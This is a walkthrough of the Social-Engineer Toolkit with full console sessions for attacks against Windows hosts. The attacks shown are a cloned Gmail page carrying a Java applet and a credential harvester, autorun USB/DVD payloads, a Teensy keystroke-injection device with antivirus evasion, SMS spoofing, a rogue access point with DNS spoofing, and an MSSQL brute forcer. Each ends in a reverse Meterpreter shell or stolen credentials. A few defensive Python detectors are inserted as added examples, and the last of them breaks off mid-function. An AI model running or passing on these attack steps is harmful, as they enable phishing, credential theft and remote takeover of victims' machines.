set:payloads> 8

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: x5sKAzS
[*] Malicious java applet website prepped for deployment
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...

[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 891 exploits - 484 auxiliary - 149 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
 =[ svn r15540 updated 23 days ago (2012.06.27)

resource (src/program_junk/meta_config)> use windows/browser/ms09_002_memory_corruption
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.

Now that we have everything running, let's browse to the website and see what is there. We are first greeted with the message that the site has been moved...

We click the link and are hit with a Metasploit exploit; look at the handler on the back end:

[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 172.16.32.131:1329...
msf exploit(ms09_002_memory_corruption) >

This exploit fails because we are using Internet Explorer 6. Once it fails, check out the victim's screen:

We hit Run, and we have a Meterpreter shell. In this instance we would be redirected back to the real Google site because the attack was successful. Notice also that when using the Java Applet, we automatically migrate into a separate process, which happens to be notepad.exe. The reason is that if the victim closes the browser, we are safe: closing the browser process will not terminate our Meterpreter shell.

[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >

Let's say that this attack failed and the user hit Cancel. He would then be prompted to enter his/her username and password into the username/password fields.

[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?ui=html
PARAM: zy=l
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-8578216484479049837
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=fYQL_bXkbzU
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT

Infectious Media Generator

Moving on to the physical attack vectors and a completely different attack method, we will be using the Infectious USB/DVD/CD attack vector. This vector lets you import your own malicious executable, or one of those within Metasploit, to create a DVD/CD/USB that incorporates an autorun.inf file. Once the device is inserted, autorun is invoked and the executable runs. New in the most recent version, you can use file-format exploits as well: if you are worried that an executable will trigger alerts, you can specify a file-format exploit that triggers an overflow and compromises the system (an Adobe exploit, for example).

Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules
 99) Return back to the main menu.

set> 3

 The Infectious USB/CD/DVD module will create an autorun.inf file and a
 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
 run if autorun is enabled.

 Pick the attack vector you wish to use: fileformat bugs or a straight executable.

 1) File-Format Exploits
 2) Standard Metasploit Executable
 99) Return to Main Menu

set:infectious> 1

Enter the IP address for the reverse connection (payload): 172.16.32.129

Select the file format exploit you want.
 The default is the PDF embedded EXE.

 ********** PAYLOADS **********

 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
 2) SET Custom Written Document UNC LM SMB Capture Attack
 3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
 4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
 5) Adobe Flash Player "Button" Remote Code Execution
 6) Adobe CoolType SING Table "uniqueName" Overflow
 7) Adobe Flash Player "newfunction" Invalid Pointer Use
 8) Adobe Collab.collectEmailInfo Buffer Overflow
 9) Adobe Collab.getIcon Buffer Overflow
 10) Adobe JBIG2Decode Memory Corruption Exploit
 11) Adobe PDF Embedded EXE Social Engineering
 12) Adobe util.printf() Buffer Overflow
 13) Custom EXE to VBA (sent via RAR) (RAR required)
 14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
 15) Adobe PDF Embedded EXE Social Engineering (NOJS)
 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
 17) Apple QuickTime PICT PnSize Buffer Overflow
 18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
 19) Adobe Reader u3D Memory Corruption Vulnerability
 20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads> 1

1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

Enter the payload you want (press enter for default):

[*] Windows Meterpreter Reverse TCP selected.

Enter the port to connect back on (press enter for default):

[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/template.pdf directory
[*] Payload generation complete. Press enter to continue.
[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.

Do you want to create a listener right now yes or no: yes

[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

resource (/pentest/exploits/set/src/program_junk/meta_config)> use multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lhost 172.16.32.129
lhost => 172.16.32.129
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lport 443
lport => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...

In this example we specified a file-format attack in order to create the infectious USB/DVD/CD. A folder called 'SET' is created in the root of the SET directory; it contains the components you need to copy over to the media device of your choosing. Once the media is inserted, the file-format exploit triggers an overflow and, if the target is susceptible, completely compromises the system with a Meterpreter shell. Had we selected the executable option, the process would have followed the same avenues walked through previously in this chapter, but instead of triggering an exploit it would run an executable.

When you run ls -al in the SET directory you should notice that there is an "autorun" folder. Burn the contents of that directory to a DVD or write them to a USB device. Once the media is inserted, you will be presented with a shell.

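The autorun.inf in that "autorun" folder is also the first thing a defender inspects when triaging removable media found on site. The inspector below is an added example, not part of SET or of this manual; the sample autorun.inf and directory listing are constructed and are not SET's actual output.

```python
"""Inspect an autorun.inf the way a defender triaging removable media would.

Added example, not part of SET or of the manual above. SAMPLE_AUTORUN and
SAMPLE_MEDIA are constructed to resemble what an infectious-media kit
drops on a CD/DVD/USB; they are not SET's actual output.
"""
import configparser
import os

# Constructed autorun.inf: one launch via "open", one via "shellexecute",
# and one custom context-menu verb. Backslashes are doubled for Python.
SAMPLE_AUTORUN = """\
[AutoRun]
open=setup.exe
icon=setup.exe,0
label=Quarterly Report
shellexecute=docs\\report.pdf
shell\\install\\command=setup.exe /silent
"""

# Constructed directory listing of the same media, Windows-style paths.
SAMPLE_MEDIA = ["autorun.inf", "setup.exe", "docs\\report.pdf"]

# Extensions that Windows runs as code when handed to ShellExecute.
EXECUTABLE_EXT = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd",
                  ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".msi"}


def parse_autorun(text):
    """Return the [autorun] section as a lowercase-keyed dict, or {} if absent.

    autorun.inf is an INI file; Windows treats section and key names
    case-insensitively and tolerates repeated keys (the last one wins),
    so the parser is configured the same way."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":
            return dict(cp[section])
    return {}


def launch_targets(entries):
    """Yield (key, program) for every directive that causes execution:
    open=, shellexecute= and any shell\\<verb>\\command= entry."""
    for key, value in entries.items():
        launches = key in ("open", "shellexecute") or (
            key.startswith("shell\\") and key.endswith("\\command"))
        if not launches or not value.strip():
            continue
        # First token is the program or document; the rest are arguments.
        program = value.strip().split()[0].strip('"')
        yield key, program


def assess(autorun_text, media_files):
    """Cross-check each launch target against the media contents and rate
    it: 'high' for executable content, 'review' for documents, which can
    still carry a file-format exploit as the manual notes."""
    present = {f.lower() for f in media_files}
    findings = []
    for key, program in launch_targets(parse_autorun(autorun_text)):
        ext = os.path.splitext(program)[1].lower()
        findings.append({
            "key": key,
            "target": program,
            "present": program.lower() in present,
            "severity": "high" if ext in EXECUTABLE_EXT else "review",
        })
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_AUTORUN, SAMPLE_MEDIA):
        print(f"{f['severity']:6} {f['key']} -> {f['target']} "
              f"({'on media' if f['present'] else 'missing'})")
```
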
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:42:32 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >

Teensy USB HID Attack Vector

The Teensy USB HID Attack Vector is a remarkable combination of customized hardware and bypassing restrictions through keyboard emulation. Traditionally, when you insert a DVD/CD or USB device and autorun is disabled, your autorun.inf is not called and you cannot execute your code automatically. With the Teensy HID-based device you can emulate a keyboard and mouse. When you insert the device it is detected as a keyboard, and with its microprocessor and onboard flash memory you can send a very fast set of keystrokes to the machine and completely compromise it. You can order a Teensy device for around 17 dollars at http://www.prjc.com. Shortly after David Kennedy, Josh Kelley, and Adrian Crenshaw's talk on the Teensy devices, a PS3 hack came out using them, and they are backordered at the time of writing this tutorial.

Let's set up our Teensy device to act as a WSCRIPT downloader for a Metasploit payload. What happens here is that a small wscript file is written out which downloads an executable and runs it. That executable is our Metasploit payload, and the whole process is handled through the Social-Engineer Toolkit.

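The defining trait of the HID attack described above is machine-speed typing, and that is what host-side detection keys on. The burst detector below is an added example, not part of SET or of this manual; the event timeline is constructed and the thresholds are assumptions a deployment would tune.

```python
"""Detect keystroke-injection bursts from a HID device such as a Teensy.

Added example, not part of SET or of the manual above. The key-event
timestamps are constructed; a real deployment would feed it events from
the OS input layer (a keyboard hook or /dev/input reader). The 20 ms /
12-key thresholds are assumptions, not measured values.
"""
import random
from dataclasses import dataclass


@dataclass
class Burst:
    start_index: int         # index of the first key in the run
    length: int              # number of keys in the run
    mean_interval_ms: float  # average gap between consecutive keys


def find_injection_bursts(timestamps_ms, max_interval_ms=20.0, min_keys=12):
    """Return runs of at least `min_keys` key presses in which every
    inter-key gap is <= max_interval_ms.

    Even fast typists rarely sustain sub-20 ms gaps for a dozen keys, while
    a scripted HID device types at a fixed, machine-speed cadence. A larger
    min_keys reduces false positives from key repeat or short pastes."""
    bursts = []
    run_start = 0
    n = len(timestamps_ms)
    for i in range(1, n + 1):  # i == n closes the final run
        in_run = i < n and (timestamps_ms[i] - timestamps_ms[i - 1]) <= max_interval_ms
        if in_run:
            continue
        run_len = i - run_start
        if run_len >= min_keys:
            span = timestamps_ms[i - 1] - timestamps_ms[run_start]
            bursts.append(Burst(run_start, run_len, span / (run_len - 1)))
        run_start = i
    return bursts


def synthetic_session(seed=7):
    """Constructed timeline: 20 human keystrokes (90-180 ms apart), a pause,
    40 injected keystrokes 4 ms apart, a pause, then 10 more human keys."""
    rng = random.Random(seed)
    t = 0.0
    events = []
    for _ in range(20):
        t += rng.uniform(90, 180)
        events.append(t)
    t += 500
    for _ in range(40):
        t += 4.0
        events.append(t)
    t += 400
    for _ in range(10):
        t += rng.uniform(90, 180)
        events.append(t)
    return events


if __name__ == "__main__":
    for b in find_injection_bursts(synthetic_session()):
        print(f"burst at key {b.start_index}: {b.length} keys, "
              f"{b.mean_interval_ms:.1f} ms apart")
```
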
Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules
 99) Return back to the main menu.

set> 6

 The Arduino-Based Attack Vector utilizes the Arduin-based device to
 program the device. You can leverage the Teensy's, which have onboard
 storage and can allow for remote code execution on the physical
 system. Since the devices are registered as USB Keyboard's it
 will bypass any autorun disabled or endpoint protection on the
 system.

 You will need to purchase the Teensy USB device, it's roughly
 $22 dollars. This attack vector will auto generate the code
 needed in order to deploy the payload on the system for you.

 This attack vector will create the .pde files necessary to import
 into Arduino (the IDE used for programming the Teensy). The attack
 vectors range from Powershell based downloaders, wscript attacks,
 and other methods.

 For more information on specifications and good tutorials visit:
 http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

 To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html

 Special thanks to: IronGeek, WinFang, and Garland

 This attack vector also attacks X10 based controllers, be sure to be leveraging
 X10 based communication devices in order for this to work.

 Select a payload to create the pde file to import into Arduino:

 1) Powershell HTTP GET MSF Payload
 2) WSCRIPT HTTP GET MSF Payload
 3) Powershell based Reverse Shell Payload
 4) Internet Explorer/FireFox Beef Jack Payload
 5) Go to malicious java site and accept applet Payload
 6) Gnome wget Download Payload
 7) Binary 2 Teensy Attack (Deploy MSF payloads)
 8) SDCard 2 Teensy Attack (Deploy Any EXE)
 9) SDCard 2 Teensy Attack (Deploy on OSX)
 10) X10 Arduino Sniffer PDE and Libraries
 11) X10 Arduino Jammer PDE and Libraries
 12) Powershell Direct ShellCode Teensy Attack
 99) Return to Main Menu

set:arduino> 2

Do you want to create a payload and listener yes or no: yes
What payload do you want to generate:
set> Do you want to create a payload and listener [yes|no]: : yes
What payload do you want to generate:

 Name: Description:
 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
 4) Windows Bind Shell Execute payload and create an accepting port on remote system
 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
 11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
 12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
 13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
 14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
 15) Import your own executable Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

 Enter your choice (enter for default):

[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino

Press enter to continue.

[*] Launching MSF Listener...
[*] This may take a few to load MSF...

[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

3519 ____________
3520
3521< metasploit >
3522
3523 ————
3524
3525 \ ,__,
3526
3527 \ (oo)____
3528
3529 (__) )\
3530
3531 ||–|| *
3532
3533
3534
3535 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
3536
3537+ — –=[ 891 exploits – 484 auxiliary – 149 post
3538
3539+ — –=[ 251 payloads – 28 encoders – 8 nops
3540
3541 =[ svn r15540 updated 23 days ago (2012.06.27)
3542
3543resource (src/program_junk/meta_config)> use exploit/multi/handler
3544
3545resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
3546
3547PAYLOAD => windows/meterpreter/reverse_tcp
3548
3549resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
3550
3551LHOST => 0.0.0.0
3552
3553resource (src/program_junk/meta_config)> set LPORT 443
3554
3555LPORT => 443
3556
3557resource (src/program_junk/meta_config)> set ExitOnSession false
3558
3559ExitOnSession => false
3560
3561resource (src/program_junk/meta_config)> exploit -j
3562
3563[*] Exploit running as background job.
3564
3565msf exploit(handler) >
3566
3567[*] Started reverse handler on 0.0.0.0:443
3568
3569[*] Starting the payload handler…
3570
3571Now that we have everything ready, SET exports a file called teensy.pde to the reports/ folder. Copy that reports folder to wherever you have Arduino installed. With this attack, follow the instructions at PRJC on how to upload your code to the Teensy board, its relatively simple you just need to install the Teensy Loader and the Teensy libraries. Once you do that you will have an IDE interface called Arduino. One of the MOST important aspects of this is to ensure you set your board to a Teensy USB Keyboard/Mouse.
3572
3573Once you have this selected, drag your pde file into the Arduino interface. Arduino/Teensy supports Linux, OSX, and Windows. Insert your USB device into the computer and upload your code. This will program your device with the SET generated code. Below is uploading and the code.
3574
3575Once the USB device is inserted on the victim machine, once finished you should be presented with a meterpreter shell.
3576
3577[*] Sending stage (748544 bytes) to 172.16.32.131
3578
3579[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:52:32 -0400 2010
3580
3581[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript ‘migrate -f’
3582
3583[*] Current server process: java.exe (824)
3584
3585[*] Spawning a notepad.exe host process…
3586
3587[*] Migrating into process ID 3044
3588
3589[*] New server process: notepad.exe (3044)
3590
3591msf exploit(ms09_002_memory_corruption) >
SMS Spoofing Attack Vector

Little hint here: this module is only the beginning of a whole new mobile attack platform for newer versions of SET. The folks at TB-Security.com introduced the SMS spoofing module. This module will allow you to spoof your phone number and send an SMS. This would be beneficial in social-engineering attacks utilizing the Credential Harvester. More attacks to come on this.

Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules
 99) Return back to the main menu.

set> 7

 The SMS module allows you to specially craft SMS messages and send them
 to a person. You can spoof the SMS source.

 This module was created by the team at TB-Security.com.

 You can use a predefined template, create your own template or specify
 an arbitrary message. The main method for this would be to get a user to
 click or coax them on a link in their browser and steal credentials or
 perform other attack vectors.

 1) Perform a SMS Spoofing Attack
 2) Create a Social-Engineering Template
 99) Return to Main Menu

set:sms>1

 SMS Attack Menu

 There are diferent attacks you can launch in the context of SMS spoofing,
 select your own.

 1. SMS Attack Single Phone Number
 2. SMS Attack Mass SMS
 99. Return to SMS Spoofing Menu

set> 1

Single SMS Attack

set:sms> Send sms to:5555555555

 1. Pre-Defined Template
 2. One-Time Use SMS
 99. Cancel and return to SMS Spoofing Menu

 set:sms> Use a predefined template or craft a one time SMS?:1

Below is a list of available templates:

1: Movistar: publicidad tarifa llamada
2: MRW: pedido no entregado
3: Vodafone Fool
4: Movistar: publicidad nieve
5: Movistar: publicidad aramon
6: Movistar: publicidad nokia gratis
7: Ministerio vivienda: incidencia pago
8: Vodafone: publicidad nuevo contrato
9: teabla: moviles gratis
10: Movistar: publicidad verano internet
11: Movistar: publicidad tarifa sms
12: Yavoy: regalo yavoy
13: Boss Fake
14: Movistar: oferta otoño
15: Movistar: publicidad navidad
16: TMB: temps espera
17: ruralvia: confirmacion de transferencia
18: Movistar: publicidad ROCKRIO
19: Tu Banco: visa disponible en oficina
20: Police Fake

set:sms> Select template:2

 Service Selection

 There are diferent services you can use for the SMS spoofing, select
 your own.

 1. SohoOS (buggy)
 2. Lleida.net (pay)
 3. SMSGANG (pay)
 4. Android Emulator (need to install Android Emulator)
 99. Cancel and return to SMS Spoofing Menu

set:sms>1

SMS sent

SET has completed.

Wireless Attack Vector

SET has an attack vector called the wireless attack vector, which will spawn an access point from a wireless interface card on your machine and leverage DNSSpoof to redirect victims' browser requests to an attack vector in SET. For example, you could create the access point and then launch the Java Applet Attack Vector or the Multi-Attack Vector; when a victim connected to the access point and browsed to a website, they would end up at your attacker machine.

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit

Enter your choice: 8

Welcome to the Wireless Attack Vector, this will create an access point leveraging
your wireless card and redirect all DNS queries to you. The concept is fairly simple,
SET will create a wireless access point, dhcp server, and spoof DNS to redirect traffic
to the attacker machine. It will then exit out of that menu with everything running as
a child process.

You can then launch any SET attack vector you want, for example the Java Applet attack and
when a victim joins your access point and tries going to a website, will be redirected to
your attacker machine.

This attack vector uses AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3 to work properly.

What do you want to do:

1. Start the SET Wireless Attack Vector Access Point
2. Stop the SET Wireless Attack Vector Access Point
3. Return to the SET main menu.

Enter your choice: 1

Enter the wireless network interface (ex. wlan0): eth0

[*] Placing card in monitor mode via airmon-ng..
[*] Spawning airbase-ng in a seperate child thread...
[*] Sleeping 15 seconds waiting for airbase-ng to complete...
[*] Bringing up the access point interface...
[*] Writing the dhcp configuration file to src/program_junk
[*] Starting the DHCP server on a seperate child thread...
[*] Starting DNSSpoof in a seperate child thread...
[*] SET has finished creating the attack. If you experienced issues please report them.
[*] Now launch SET attack vectors within the menus and have a victim connect via wireless.
[*] Be sure to come back to this menu to stop the services once your finished.
[*] Press [return] to go back to the main menu.

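The rogue access point above works because every DNS answer points at the attacker machine. A client-side check for that symptom, added here as an example and not part of SET or the original post (the probe names and the sample answer sets are assumptions chosen for the demo):

```python
"""Client-side check for the DNS behaviour of a rogue access point that
answers every query with one address (the dnsspoof setup described above).
Added example, not SET code. Probe names and sample answers are constructed."""
import ipaddress
import socket
from collections import Counter

# Unrelated names run by different operators; on an honest resolver they
# should not all share one address. Assumption: these names stay resolvable.
PROBE_NAMES = ("example.com", "iana.org", "ietf.org", "ripe.net", "debian.org")


def resolve_all(names, resolver=socket.gethostbyname):
    """Resolve each name with `resolver`; a failed lookup is recorded as None."""
    answers = {}
    for name in names:
        try:
            answers[name] = resolver(name)
        except OSError:
            answers[name] = None
    return answers


def check_dns_sinkhole(answers, threshold=0.8, min_answers=3):
    """Flag a resolver that maps most unrelated names onto a single address.

    answers: {name: ip or None}. Returns a dict carrying the verdict and the
    evidence so a caller can log it. Fewer than `min_answers` successful
    lookups is reported as inconclusive rather than suspicious.
    """
    resolved = {n: ip for n, ip in answers.items() if ip}
    if len(resolved) < min_answers:
        return {"suspicious": False, "shared_ip": None, "share": 0.0,
                "reason": "inconclusive: fewer than %d names resolved" % min_answers}
    ip, hits = Counter(resolved.values()).most_common(1)[0]
    share = hits / len(resolved)
    reason = "%d/%d unrelated names resolve to %s" % (hits, len(resolved), ip)
    if ipaddress.ip_address(ip).is_private:
        reason += " (private address, consistent with the AP answering for everyone)"
    return {"suspicious": share >= threshold, "shared_ip": ip,
            "share": share, "reason": reason}


# Constructed samples: what a client on the rogue AP would see, and a normal set.
ROGUE_AP_ANSWERS = {name: "10.0.0.1" for name in PROBE_NAMES}
NORMAL_ANSWERS = {"example.com": "203.0.113.10", "iana.org": "198.51.100.7",
                  "ietf.org": "203.0.113.44", "ripe.net": "192.0.2.200",
                  "debian.org": "198.51.100.91"}

if __name__ == "__main__":
    # Live run against whatever resolver this host is currently using.
    verdict = check_dns_sinkhole(resolve_all(PROBE_NAMES))
    print("suspicious:", verdict["suspicious"], "-", verdict["reason"])
```

Run on its own the script queries the host's current resolver and prints the verdict; the two constructed dicts show both outcomes offline. The caveat is CDN fronting: genuinely unrelated sites can legitimately share an address, so the probe list should mix operators and the threshold should stay high, and a shared private address is stronger evidence than a shared public one.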
QRCode Attack Vector

The QRCode attack vector utilizes the ability to generate QRCodes natively in Python. When scanned, it will redirect to the SET attack vector. What's great about this attack is the ability to redirect victims to any of the built-in attack vectors SET has available to them.

Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules
 99) Return back to the main menu.

set> 9

The QRCode Attack Vector will create a QRCode for you with whatever URL you want.
When you have the QRCode Generated, select an additional attack vector within SET and
deploy the QRCode to your victim. For example, generate a QRCode of the SET Java Applet
and send the QRCode via a mailer.

Enter the URL you want the QRCode to go to: https://www.trustedsec.com

[*] [*] QRCode has been generated under reports/qrcode_attack.png!

QRCode generated.

Fast-Track Exploitation

Fast-Track was originally created several years ago and automated several complex attack vectors. Fast-Track has additional exploits, attack vectors, and attacks that you can use during a penetration test.

Select from the menu:

 1) Social-Engineering Attacks
 2) Fast-Track Penetration Testing
 3) Third Party Modules
 4) Update the Metasploit Framework
 5) Update the Social-Engineer Toolkit
 6) Update SET configuration
 7) Help, Credits, and About
 99) Exit the Social-Engineer Toolkit

set> 2

Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing platform. These attack vectors
have a series of exploits and automation aspects to assist in the art of penetration testing. SET
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.

 1) Microsoft SQL Bruter
 2) Custom Exploits
 99) Return to Main Menu

set:fasttrack>1

Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing Microsoft SQL Brute Forcer. This attack vector will attempt to identify live MSSQL servers and brute force the weak account passwords that may be found. If that occurs, SET will then compromise the affected system by deploying a binary to hexadecimal attack vector which will take a raw binary, convert it to hexadecimal and use a staged approach in deploying the hexadecimal form of the binary onto the underlying system. At this point, a trigger will occur to convert the payload back to a binary for us.
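The binary-to-hexadecimal staging described in that banner leaves a recognisable trace in MSSQL audit or query logs: statements carrying unusually long 0x literals, usually several in a row from one session. The detection logic below is an added example written for this page, not SET code; the tab-separated audit line format and the sample lines are constructed.

```python
"""Detection logic for binary staging through MSSQL: a raw binary pushed in
as hexadecimal literals, chunk by chunk, and reassembled on the host.
Added example, not SET code. The audit lines below are constructed."""
import re
from collections import defaultdict

# A 0x literal of at least 16 bytes (32 hex digits); short literals are
# ordinary in T-SQL and are ignored.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{32,})")


def scan_sql_audit(lines, chunk_bytes=200, session_bytes=1024):
    """Score hex-literal volume per session.

    Each line is 'timestamp<TAB>session<TAB>statement'. Returns a dict with
    per-session byte totals and the sessions that crossed either threshold:
    one large chunk, or moderate chunks adding up across statements (the
    staged delivery pattern). Lines that do not parse are skipped.
    """
    totals = defaultdict(int)
    flagged = {}
    for line in lines:
        parts = line.split("\t", 2)
        if len(parts) != 3:
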